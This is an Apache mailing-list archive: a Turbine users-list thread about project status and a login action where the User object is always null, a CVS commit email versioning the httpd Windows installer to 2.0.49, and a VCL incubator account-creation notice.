noise is the answer... >>> >>> >>> -----Original Message----- >>> From: Nick Ide [mailto:[email protected]] Sent: Wednesday, January 30, >>> 2008 4:10 PM >>> To: [email protected] >>> Subject: what is current status and likely future of turbine ? >>> >>> We have built several projects in the past using turbine. >>> We are beginning a new project and trying to decide whether to >>> use turbine or try something else. We are a little concerned that >>> turbine is dead or dying from lack of community. >>> >>> My questions: >>> >>> 1. When will turbine 2.3.3 be released ? >>> 2. Is anybody working on that release ? >>> 3. Is there any active work on the turbine code base ? >>> 4. If there is no work, is that because it all just works or because >>> everybody has abandoned turbine in favor of something else ? >>> 5. Probably asking the crowd since the people who voted with their >>> feet have stopped listening, but what do you suppose >>> people have adopted to use instead of turbine ? is it VelocityStruts= ? >>> >>> is it Spring ? Others ? >>> >>> >>> -Nick >>> >>> --------------------------------------------------------------------- >>> To unsubscribe, e-mail: [email protected] >>> For additional commands, e-mail: [email protected] >>> >>> >>> --------------------------------------------------------------------- >>> To unsubscribe, e-mail: [email protected] >>> For additional commands, e-mail: [email protected] >>> >>> >>> >> Just thought I would pop in real quick to let you all know that this >> is something I have been very interested in as well. I have worked >> heavily with a turbine project for the last 3 years and it has worked >> quite well for me. I am about to start a new project, and was also >> curious if turbine is dead, or if its just completed and bug free... >> >> AFrieze >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: [email protected] >> For additional commands, e-mail: [email protected] >> >> > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jan 31 22:57:54 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71724 invoked from network); 31 Jan 2008 22:57:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Jan 2008 22:57:54 -0000 Received: (qmail 33924 invoked by uid 500); 31 Jan 2008 22:57:44 -0000 Delivered-To: [email protected] Received: (qmail 33910 invoked by uid 500); 31 Jan 2008 22:57:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 33707 invoked by uid 99); 31 Jan 2008 19:53:31 -0000 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references:x-google-sender-auth; bh=CpmtYUiAR/TtIAnf1Fw8d1Nfxg9zKtfplC5CZu4CkdQ=; b=pwnjt/ZvHIh4RAEarg6M1N3r1yb+jfnSW1SM/2/SBfoK0CFrzaV2Yj5HjlqY3acrq3+zWYgQ3IvKL6Cc23AkfISv7pZcN8Az87VufJkqVwuyBJb22t+cGx+/NFa6urK3jFkNCErmU0NLHSbaV3WkYMAMMoZVfa8RzH19lQGmyY4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:references:x-google-sender-auth; b=Pj0wUi59vAhs7SZ36ZkoParNBImurUuNdx10bDhJZ+9kJeJweElF6s7ZCdrNdhdvPNM6dLvtl8B1eSybG86vW1CpbwTgcL21AYyoDYMo5hccaoHeVY5zr2im6ei0+eL5Zof/s6/V/rli5V0CTtJxO7GrWdfKRRdUoO4N4itJCmM= Message-ID: <[email protected]> Date: Fri, 1 Feb 2008 01:20:40 +0530 From: "Babu K" <[email protected]> Sender: [email protected] To: "Turbine Users List" <[email protected]> Subject: Re: user is nulled out on login attempt In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_5532_377862.1201809040413" References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Google-Sender-Auth: 4070c65168c313c8 X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_5532_377862.1201809040413 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline Hi, When you say "already logged in" - do you want to check if the user is logged in from another computer ? If that is the case, your user object WILL NOT show up in the session for the current browser. To implement this functionality, you will have to keep track of logged in users through some separate mechanism (like say a HashSet into which you add any new user that logs in - first check if the user is present in the HashSet, and if so direct them to a page that says they're already logged in, otherwise log them in and add them to this HashSet) . You would also need to keep track of when a user logs out and when a session times out, so that you can remove the user from this HashSet when either of these occur. Check out the HttpSessionBindingListener interface. The easiest way is for your User object to implement this interface and Add / Remove itself from the HashSet when the valueBound() / valueUnbound() methods are called respectively. BK On Feb 1, 2008 12:40 AM, Shaw, Nathan (HQ-LD070)[InDyne, Inc] < [email protected]> wrote: > Thanks Jeffrey, > > The problem is not in logging a user in... the action I have is doing that > just fine. The problem is when you try to detect if a user calling the login > action is ALREADY logged in or not (in this case, we have guest users coming > in from another site). > > I want to make it so if the user is already logged in, it does not log > them in again. However, when I test the User returned in the doperform() > method in my login action, it is always NULL. It appears that something up > the chain is wiping the User object and the session. > > --Nathan > > > -----Original Message----- > From: Jeffery Painter [mailto:[email protected]] > Sent: Thu 1/31/2008 1:08 PM > To: Turbine Users List > Subject: RE: user is nulled out on login attempt > > > I had used Turbine to build a prototype of an electronic health record > system. > > I can't remember if we were using Turbine 2.1 or 2.2 but I have my custom > login action is here: > > > http://office.kiasoft.com/viewcvs/viewcvs.cgi/agrippa/WebRoot/WEB-INF/src/edu/ncsu/csc/agrippa/modules/actions/AgrippaLoginUser.java?rev=161.129.204.104&content-type=text/vnd.viewcvs-markup > > Maybe that will give you some insight... it worked last time I ran the > code but that was Dec 2006... > > Hope it helps > > -- > Jeffery Painter > Knowledge Engineer > Semantic Technologies Group > Statistical and Quantitative Sciences > GlaxoSmithKline Research and Development > > > > I don't get that. The test is if the user is NOT null. > > > > Anyway, it does work. I took it from my SNA login code (our first > > Turbine project.) > > > > -----Original Message----- > > From: Shaw, Nathan (HQ-LD070)[InDyne, Inc] > > [mailto:[email protected]] > > Sent: Thursday, January 31, 2008 12:17 PM > > To: Turbine Users List > > Subject: RE: user is nulled out on login attempt > > > > I don't think that will work because that will mean that the user is > > null and is not logged [email protected]. It will actually probably be caught by > > the SessionValidator and just take them back to the login page. > > > > I am actually checking the User object and outputting whether it is null > > or not in the login action. I tried both getUser() and > > getUserFromSession() and they are both NULL every single time a login is > > attempted. Something up the chain is clearing all of that out before the > > login occurs. > > > > --Nathan > > > > > > -----Original Message----- > > From: Altner, Bruce (HQ-LD070)[InDyne, Inc] > > [mailto:[email protected]] > > Sent: Thu 1/31/2008 9:29 AM > > To: Turbine Users List > > Subject: RE: user is nulled out on login attempt > > > > How about just doing this, early in the Login action doPerform method > > (first thing?): > > > > > > if ( data.getUserFromSession() != null ) > > { > > return; > > } > > > > > > Bruce > > > > -----Original Message----- > > From: Shaw, Nathan (HQ-LD070)[InDyne, Inc] > > [mailto:[email protected]] > > Sent: Thursday, January 31, 2008 8:35 AM > > To: [email protected] > > Subject: user is nulled out on login attempt > > > > > > Hi all, > > > > I am writing my own login action and need to be able to check to see if > > a user is already logged in when the action is called. If they are, I > > want to skip the login stuff to preserve their session. However, every > > single time that the login action is called, the User object is coming > > back NULL. > > > > Here is a code snippet. Does anyone have any idea WHY the user is coming > > back NULL? I assume something is happening in Turbine somewhere that > > wipes the User on a login attempt or something? > > > > > > public class OutageCalLoginUser extends LoginUser { > > > > public void doPerform( RunData data, Context context) throws Exception { > > String uname ; > > String passwd ; > > > > System.out.println("doPerform(data, context)"); > > if ( data.getUserFromSession() == null ){ > > System.out.println("user from session is null"); > > }else{ > > System.out.println("user from session is NOT null"); > > } > > > > if(data.getUser() == null){ > > System.out.println("user is null"); > > }else{ > > System.out.println("user is NOT null"); > > if(data.getUser().hasLoggedIn()){ > > System.out.println("user is logged in"); > > }else{ > > System.out.println("user is NOT logged in"); > > } > > } > > > > > > if((data.getUser() == null) || (data.getUser() != null && > > data.getUser().hasLoggedIn() == false)){ > > > > try { > > SymEncDec enc = SymEncDec.getInstance(); > > > > // Username/password = username/pswd coming through front > > door. > > // User coming from elsewhere will have neither username > > nor pswd. > > String username = data.getParameters().get("username"); > > String pswd = data.getParameters().get("password"); > > > > // If username exists, user came in the front door. > > if (username != null && username.length()>0) { > > uname = username; > > passwd = pswd; > > }else { > > uname = "guest"; > > String encryptedPasswd = > > TurbineResources.getString("guest.credential"); > > passwd = encryptedPasswd; > > //enc.decodeBase64Decrypt(encryptedPasswd); > > } > > // Log the user in > > doLogin(data, uname, passwd); > > > > try { > > Utils.getUserID(data); > > } > > catch (NullPointerException npe) { > > throw new TurbineSecurityException("Bad username or > > password, I say!"); > > } > > > > } > > catch ( TurbineSecurityException se ) { > > badUserOrPassword(se, data); > > } > > catch (Exception e) { > > throw new PortalVelocityException(e.getMessage()=ull?": > > "+e.getMessage():e.getMessage(), > > e.getCause()=ull?e:e.getCause(), data); > > } > > > > } > > } > > > > } > > > > --------------------------------------------------------------------- > > To unsubscribe, e-mail: [email protected] > > For additional commands, e-mail: [email protected] > > > > > > > > > > > > --------------------------------------------------------------------- > > To unsubscribe, e-mail: [email protected] > > For additional commands, e-mail: [email protected] > > > > > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > > > ------=_Part_5532_377862.1201809040413-- From [email protected] Fri Feb 01 00:01:18 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98523 invoked from network); 1 Feb 2008 00:01:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Feb 2008 00:01:18 -0000 Received: (qmail 35420 invoked by uid 500); 1 Feb 2008 00:01:09 -0000 Delivered-To: [email protected] Received: (qmail 35401 invoked by uid 500); 1 Feb 2008 00:01:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 35392 invoked by uid 99); 1 Feb 2008 00:01:09 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 31 Jan 2008 16:01:09 -0800 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO elasmtp-spurfowl.atl.sa.earthlink.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 01 Feb 2008 00:00:51 +0000 Received: from [161.129.204.104] (helo=office.kiasoft.com) by elasmtp-spurfowl.atl.sa.earthlink.net with asmtp (Exim 4.34) id 1JKjKk-0003Yz-9F for [email protected]; Thu, 31 Jan 2008 19:00:43 -0500 Received: by office.kiasoft.com (Postfix, from userid 48) id 559CF168851; Thu, 31 Jan 2008 18:03:09 -0500 (EST) Received: from 161.129.204.104 (SquirrelMail authenticated user painter) by webmail.kiasoft.com with HTTP; Thu, 31 Jan 2008 18:03:09 -0500 (EST) Message-ID: <{{EMAIL+SOCIAL_SECURITY_NUMBER}}> In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Thu, 31 Jan 2008 18:03:09 -0500 (EST) Subject: Re: user is nulled out on login attempt From: "Jeffery Painter" <[email protected]> To: "Turbine Users List" <[email protected]> Reply-To: [email protected] User-Agent: SquirrelMail/1.4.8-2.fc6 MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 X-Priority: 3 (Normal) Importance: Normal Content-Transfer-Encoding: quoted-printable X-ELNK-Trace: cf82c58664c8867910a091893a8585a77e972de0d01da94048665b101eca47603d21ecde5e3246c1350badd9bab72f9c350badd9bab72f9c350badd9bab72f9c X-Originating-IP: 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org hmm... If this is the case, then I recall this was asked/addressed a few years back. I would look through the archives again (looking specifically for detecting more than one active login) - it seems someone wrote a tool to handle just that (or maybe it was in the 2.4 tree) -- maybe some of th= e other old timers can remember better than I. -- Jeffery Painter > Hi, > > When you say "already logged in" - do you want to check if the user is > logged in from another computer ? If that is the case, your user object > WILL > NOT show up in the session for the current browser. > > To implement this functionality, you will have to keep track of logged = in > users through some separate mechanism (like say a HashSet into which yo= u > add > any new user that logs in - first check if the user is present in the > HashSet, and if so direct them to a page that says they're already logg= ed > in, otherwise log them in and add them to this HashSet) . > > You would also need to keep track of when a user logs out and when a > session > times out, so that you can remove the user from this HashSet when eithe= r > of > these occur. Check out the HttpSessionBindingListener interface. The > easiest > way is for your User object to implement this interface and Add / Remov= e > itself from the HashSet when the valueBound() / valueUnbound() methods = are > called respectively. > > BK > > > On Feb 1, 2008 12:40 AM, Shaw, Nathan (HQ-LD070)[InDyne, Inc] < > [email protected]> wrote: > >> Thanks Jeffrey, >> >> The problem is not in logging a user in... the action I have is doing >> that >> just fine. The problem is when you try to detect if a user calling the >> login >> action is ALREADY logged in or not (in this case, we have guest users >> coming >> in from another site). >> >> I want to make it so if the user is already logged in, it does not log >> them in again. However, when I test the User returned in the doperform= () >> method in my login action, it is always NULL. It appears that somethin= g >> up >> the chain is wiping the User object and the session. >> >> --Nathan >> >> >> -----Original Message----- >> From: Jeffery Painter [mailto:[email protected]] >> Sent: Thu 1/31/2008 1:08 PM >> To: Turbine Users List >> Subject: RE: user is nulled out on login attempt >> >> >> I had used Turbine to build a prototype of an electronic health record >> system. >> >> I can't remember if we were using Turbine 2.1 or 2.2 but I have my >> custom >> login action is here: >> >> >> http://office.kiasoft.com/viewcvs/viewcvs.cgi/agrippa/WebRoot/WEB-INF/= src/edu/ncsu/csc/agrippa/modules/actions/AgrippaLoginUser.java?rev=3D1.1.= 1.1&content-type=3Dtext/vnd.viewcvs-markup >> >> Maybe that will give you some insight... it worked last time I ran the >> code but that was Dec 2006... >> >> Hope it helps >> >> -- >> Jeffery Painter >> Knowledge Engineer >> Semantic Technologies Group >> Statistical and Quantitative Sciences >> GlaxoSmithKline Research and Development >> >> >> > I don't get that. The test is if the user is NOT null. >> > >> > Anyway, it does work. I took it from my SNA login code (our first >> > Turbine project.) >> > >> > -----Original Message----- >> > From: Shaw, Nathan (HQ-LD070)[InDyne, Inc] >> > [mailto:[email protected]] >> > Sent: Thursday, January 31, 2008 12:17 PM >> > To: Turbine Users List >> > Subject: RE: user is nulled out on login attempt >> > >> > I don't think that will work because that will mean that the user is >> > null and is not logged [email protected]. It will actually probably be caugh= t >> by >> > the SessionValidator and just take them back to the login page. >> > >> > I am actually checking the User object and outputting whether it is >> null >> > or not in the login action. I tried both getUser() and >> > getUserFromSession() and they are both NULL every single time a logi= n >> is >> > attempted. Something up the chain is clearing all of that out before >> the >> > login occurs. >> > >> > --Nathan >> > >> > >> > -----Original Message----- >> > From: Altner, Bruce (HQ-LD070)[InDyne, Inc] >> > [mailto:[email protected]] >> > Sent: Thu 1/31/2008 9:29 AM >> > To: Turbine Users List >> > Subject: RE: user is nulled out on login attempt >> > >> > How about just doing this, early in the Login action doPerform metho= d >> > (first thing?): >> > >> > >> > if ( data.getUserFromSession() !=3D null ) >> > { >> > return; >> > } >> > >> > >> > Bruce >> > >> > -----Original Message----- >> > From: Shaw, Nathan (HQ-LD070)[InDyne, Inc] >> > [mailto:[email protected]] >> > Sent: Thursday, January 31, 2008 8:35 AM >> > To: [email protected] >> > Subject: user is nulled out on login attempt >> > >> > >> > Hi all, >> > >> > I am writing my own login action and need to be able to check to see >> if >> > a user is already logged in when the action is called. If they are, = I >> > want to skip the login stuff to preserve their session. However, eve= ry >> > single time that the login action is called, the User object is comi= ng >> > back NULL. >> > >> > Here is a code snippet. Does anyone have any idea WHY the user is >> coming >> > back NULL? I assume something is happening in Turbine somewhere that >> > wipes the User on a login attempt or something? >> > >> > >> > public class OutageCalLoginUser extends LoginUser { >> > >> > public void doPerform( RunData data, Context context) throws Excepti= on >> { >> > String uname ; >> > String passwd ; >> > >> > System.out.println("doPerform(data, context)"); >> > if ( data.getUserFromSession() =3D=3D null ){ >> > System.out.println("user from session is null"); >> > }else{ >> > System.out.println("user from session is NOT null"); >> > } >> > >> > if(data.getUser() =3D=3D null){ >> > System.out.println("user is null"); >> > }else{ >> > System.out.println("user is NOT null"); >> > if(data.getUser().hasLoggedIn()){ >> > System.out.println("user is logged in"); >> > }else{ >> > System.out.println("user is NOT logged in"); >> > } >> > } >> > >> > >> > if((data.getUser() =3D=3D null) || (data.getUser() !=3D null && >> > data.getUser().hasLoggedIn() =3D=3D false)){ >> > >> > try { >> > SymEncDec enc =3D SymEncDec.getInstance(); >> > >> > // Username/password =3D username/pswd coming through fr= ont >> > door. >> > // User coming from elsewhere will have neither username >> > nor pswd. >> > String username =3D data.getParameters().get("username")= ; >> > String pswd =3D data.getParameters().get("password"); >> > >> > // If username exists, user came in the front door. >> > if (username !=3D null && username.length()>0) { >> > uname =3D username; >> > passwd =3D pswd; >> > }else { >> > uname =3D "guest"; >> > String encryptedPasswd =3D >> > TurbineResources.getString("guest.credential"); >> > passwd =3D encryptedPasswd; >> > //enc.decodeBase64Decrypt(encryptedPasswd); >> > } >> > // Log the user in >> > doLogin(data, uname, passwd); >> > >> > try { >> > Utils.getUserID(data); >> > } >> > catch (NullPointerException npe) { >> > throw new TurbineSecurityException("Bad username or >> > password, I say!"); >> > } >> > >> > } >> > catch ( TurbineSecurityException se ) { >> > badUserOrPassword(se, data); >> > } >> > catch (Exception e) { >> > throw new PortalVelocityException(e.getMessage()=3Dull?"= : >> > "+e.getMessage():e.getMessage(), >> > e.getCause()=3Dull?e:e.getCause(), data); >> > } >> > >> > } >> > } >> > >> > } >> > >> > --------------------------------------------------------------------= - >> > To unsubscribe, e-mail: [email protected] >> > For additional commands, e-mail: [email protected] >> > >> > >> > >> > >> > >> > --------------------------------------------------------------------= - >> > To unsubscribe, e-mail: [email protected] >> > For additional commands, e-mail: [email protected] >> > >> >> >> >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: [email protected] >> For additional commands, e-mail: [email protected] >> >> >> >> > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Fri Mar 19 10:33:15 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6852 invoked from network); 19 Mar 2004 10:33:15 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 19 Mar 2004 10:33:15 -0000 Received: (qmail 75732 invoked by uid 500); 19 Mar 2004 10:32:49 -0000 Delivered-To: [email protected] Received: (qmail 75723 invoked by uid 500); 19 Mar 2004 10:32:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75692 invoked from network); 19 Mar 2004 10:32:48 -0000 Received: from unknown (HELO minotaur.apache.org) (161.129.204.104) by daedalus.apache.org with SMTP; 19 Mar 2004 10:32:48 -0000 Received: (qmail 6836 invoked by uid 1134); 19 Mar 2004 10:33:14 -0000 Date: 19 Mar 2004 10:33:14 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: httpd-win32-msi License.rtf apache_2.0-win32.isv X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N wrowe 2004/03/19 02:33:14 Modified: . License.rtf apache_2.0-win32.isv Log: 2.0.49 requires new license & usual updates Revision Changes Path 1.5 +252 -13 httpd-win32-msi/License.rtf Index: License.rtf =================================================================== RCS file: /home/cvs/httpd-win32-msi/License.rtf,v retrieving revision 1.4 retrieving revision 1.5 diff -u -r1.4 -r1.5 Binary files /tmp/cvspiOXlj and /tmp/cvslM6mYo differ 1.28 +8 -8 httpd-win32-msi/apache_2.0-win32.isv Index: apache_2.0-win32.isv =================================================================== RCS file: /home/cvs/httpd-win32-msi/apache_2.0-win32.isv,v retrieving revision 1.27 retrieving revision 1.28 diff -u -r1.27 -r1.28 --- apache_2.0-win32.isv 29 Oct 2003 18:28:04 -0000 1.27 +++ apache_2.0-win32.isv 19 Mar 2004 10:33:13 -0000 1.28 @@ -1,7 +1,7 @@ # InstallShield for Windows Installer Generated Project File # ** Do Not Edit ** -------------------------------------------------------- -KeyCount254638 +KeyCount261050 -------------------------------------------------------- 1 035 133ACTION 233 333 1033 2 035 133ACTIONTEXT 233 333 TKey33f 1033f 1133f @@ -1051,7 +1051,7 @@ R55608(Default) REGISTRYKEY R55608 (Default) %%%%NOVALUESET%%%% 1 Apache REGISTRYKEY R55609 2 0 0 -1 -1 0 0 0 0 R55609(Default) REGISTRYKEY R55609 (Default) %%%%NOVALUESET%%%% 1 -2.0.48 REGISTRYKEY R55610 2 0 0 -1 -1 0 0 0 0 +2.0.49 REGISTRYKEY R55610 2 0 0 -1 -1 0 0 0 0 R55610(Default) REGISTRYKEY R55610 (Default) %%%%NOVALUESET%%%% 1 R55610ServerRoot REGISTRYKEY R55610 ServerRoot [APACHEDIR] 1 R55610Shared REGISTRYKEY R55610 Shared 1 0 @@ -1106,7 +1106,7 @@ R173771(Default) REGISTRYKEY R173771 (Default) %%%%NOVALUESET%%%% 1 Apache REGISTRYKEY R173772 2 0 0 -1 -1 0 0 0 0 R173772(Default) REGISTRYKEY R173772 (Default) %%%%NOVALUESET%%%% 1 -2.0.48 REGISTRYKEY R173773 2 0 0 -1 -1 0 0 0 0 +2.0.49 REGISTRYKEY R173773 2 0 0 -1 -1 0 0 0 0 R173773(Default) REGISTRYKEY R173773 (Default) %%%%NOVALUESET%%%% 1 R173773Installed REGISTRYKEY R173773 Installed 1 0 REG_HKLM REGISTRYKEY R151086 2 0 0 -1 -1 0 0 0 0 @@ -3544,7 +3544,7 @@ ISPATCH_LAYOUT ISPATCH_LAYOUT ISPATCH_LAYOUT 1 ISPATCHPACKAGE_LAYOUT ISPATCHPACKAGE_LAYOUT ISPATCHPACKAGE_LAYOUT 1 PRODUCT_LAYOUT PRODUCT_LAYOUT PRODUCT_LAYOUT 1 -Apache HTTP Server 2.0 PRODUCT P794 1 M208940 http://httpd.apache.org ##AppProduct## 0 0 Default 555-555-1234 http://httpd.apache.org MS Visual C++ 2.0.48 http://www.yourcompany.com {C49BD74F-8B16-47B5-88A5-B86D3D15AEB5} ##AppPublisher## Internet Application [ProgramFilesFolder]\Apache Group\ Intel +Apache HTTP Server 2.0 PRODUCT P794 1 M194225 http://httpd.apache.org ##AppProduct## 0 0 Default 555-555-1234 http://httpd.apache.org MS Visual C++ 2.0.49 http://www.yourcompany.com {C49BD74F-8B16-47B5-88A5-B86D3D15AEB5} ##AppPublisher## Internet Application [ProgramFilesFolder]\Apache Group\ Intel Default MEDIA_GROUP M795 1 Default LAUNCHCONDITION_GROUP L796 1 Default ADMIN_EXESEQUENCE_GROUP A139 1 @@ -4673,7 +4673,7 @@ S1075IDS_SetupTips_16 STRINGS S1075 IDS_SetupTips_16 <ISProductFolder>\Redist\Language Independent\OS Independent\InstallFirstUse.ico 0 S1075IDS_SetupTips_17 STRINGS S1075 IDS_SetupTips_17 <ISProductFolder>\Redist\Language Independent\OS Independent\InstallPartial.ico 0 S1075IDS_SetupTips_19 STRINGS S1075 IDS_SetupTips_19 <ISProductFolder>\Redist\Language Independent\OS Independent\InstallStateMenu.ico 0 -S1075AppProduct STRINGS S1075 AppProduct Apache HTTP Server 2.0.48 37303.+1-430-389-9811 SYSTEM_GENERATED +S1075AppProduct STRINGS S1075 AppProduct Apache HTTP Server 2.0.49 37303.+1-430-389-9811 SYSTEM_GENERATED S1075IDS__IsReadmeDlg_1 STRINGS S1075 IDS__IsReadmeDlg_1 Please read the following readme information carefully. 0 S1075IDS__IsDatabaseLocation_12 STRINGS S1075 IDS__IsDatabaseLocation_12 {&MSSWhiteSerif8}InstallShield 0 S1075IDS__IsDatabaseLocation_13 STRINGS S1075 IDS__IsDatabaseLocation_13 [ApplicationName] - Installation Wizard 0 @@ -5711,12 +5711,12 @@ P791CommonFilesFolder PATHVARIABLES P791 CommonFilesFolder 1 P791ISProjectFolder PATHVARIABLES P791 ISProjectFolder 1 P791ISProductFolder PATHVARIABLES P791 ISProductFolder 1 -P791ApacheBuildFolder PATHVARIABLES P791 ApacheBuildFolder c:\asf-build\build-2.0.48 2 -P791ApacheTargetFolder PATHVARIABLES P791 ApacheTargetFolder c:\asf-build\target-2.0.48 2 +P791ApacheBuildFolder PATHVARIABLES P791 ApacheBuildFolder c:\asf-build\build-2.0.49 2 +P791ApacheTargetFolder PATHVARIABLES P791 ApacheTargetFolder c:\asf-build\target-2.0.49 2 ISAUTMERGEMODULE_LAYOUT ISAUTMERGEMODULE_LAYOUT ISAUTMERGEMODULE_LAYOUT 1 DISKMAP_LAYOUT DISKMAP_LAYOUT DISKMAP_LAYOUT 1 BUILDLABEL_LAYOUT BUILDLABEL_LAYOUT BUILDLABEL_LAYOUT 1 -win32 BUILDLABEL B4077 1 ##AppProduct_Description## 2.0.48 ##IDS_Dev_Warning## ##IDS_Package_Title## Apache HTTP Server 2.0.48 {495826D5-C9CF-4E88-B694-382EE6A85AEC} 0 0 1 +win32 BUILDLABEL B4077 1 ##AppProduct_Description## 2.0.49 ##IDS_Dev_Warning## ##IDS_Package_Title## Apache HTTP Server 2.0.49 {495826D5-C9CF-4E88-B694-382EE6A85AEC} 0 0 1 Default PROPERTIES P4078 2 P4078ProductCode PROPERTIES P4078 ProductCode {3A862C7D-0504-48BC-AEF8-7F7479C7C158} 0 P4078UpgradeCode PROPERTIES P4078 UpgradeCode {0EA14757-3D48-4F78-878E-B9AF261753D9} 0 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Fri Nov 14 14:24:31 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74403 invoked from network); 14 Nov 2008 14:24:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Nov 2008 14:24:31 -0000 Received: (qmail 46928 invoked by uid 500); 14 Nov 2008 14:24:38 -0000 Delivered-To: [email protected] Received: (qmail 46916 invoked by uid 500); 14 Nov 2008 14:24:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <vcl-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 46905 invoked by uid 99); 14 Nov 2008 14:24:38 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 06:24:38 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mho-02-bos.mailhop.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 14 Nov 2008 14:23:17 +0000 Received: from bi01p1.nc.us.ibm.com ([161.129.204.104] helo=Hogstrom-009027164127.raleigh.ibm.com) by mho-02-bos.mailhop.org with esmtpsa (TLSv1:AES128-SHA:128) (Exim 4.68) (envelope-from <[email protected]>) id 1L0zZN-000Jbi-T2 for [email protected]; Fri, 14 Nov 2008 14:22:46 +0000 X-Mail-Handler: MailHop Outbound by DynDNS X-Originating-IP: 161.129.204.104 X-Report-Abuse-To: [email protected] (see http://www.mailhop.org/outbound/abuse.html for abuse reporting information) X-MHO-User: U2FsdGVkX19L0VzViBsoABpTNlBedavM Message-Id: <[email protected]> From: Matt Hogstrom <[email protected]> To: [email protected] Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v929.2) Subject: Accounts Created - Need Karma Date: Fri, 14 Nov 2008 09:22:44 -0500 X-Mailer: Apple Mail (2.929.2) X-Virus-Checked: Checked by ClamAV on apache.org Looks like the majority of the accounts have been created. I expect that everyone that is listed below has received a private e-mail with your access information. Kevan, can you grant karma for these folks to vcl in the asf-authorizations files? dls Don Sizemore fapeeler Aaron Peeler akurth Andrew Kurth bmbouter Brian Bouterse jbass John Bass jfthomps Josh Thompson mkg Mark Gardner vouk Mladen Vouk thorpe Steven Thorpe I'll post a separate thread on what we need to do to get going. From [email protected] Fri Nov 14 14:25:55 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75298 invoked from network); 14 Nov 2008 14:25:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Nov 2008 14:25:53 -0000 Received: (qmail 49991 invoked by uid 500); 14 Nov 2008 14:26:00 -0000 Delivered-To: [email protected] Received: (qmail 49982 invoked by uid 500); 14 Nov 2008 14:26:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: 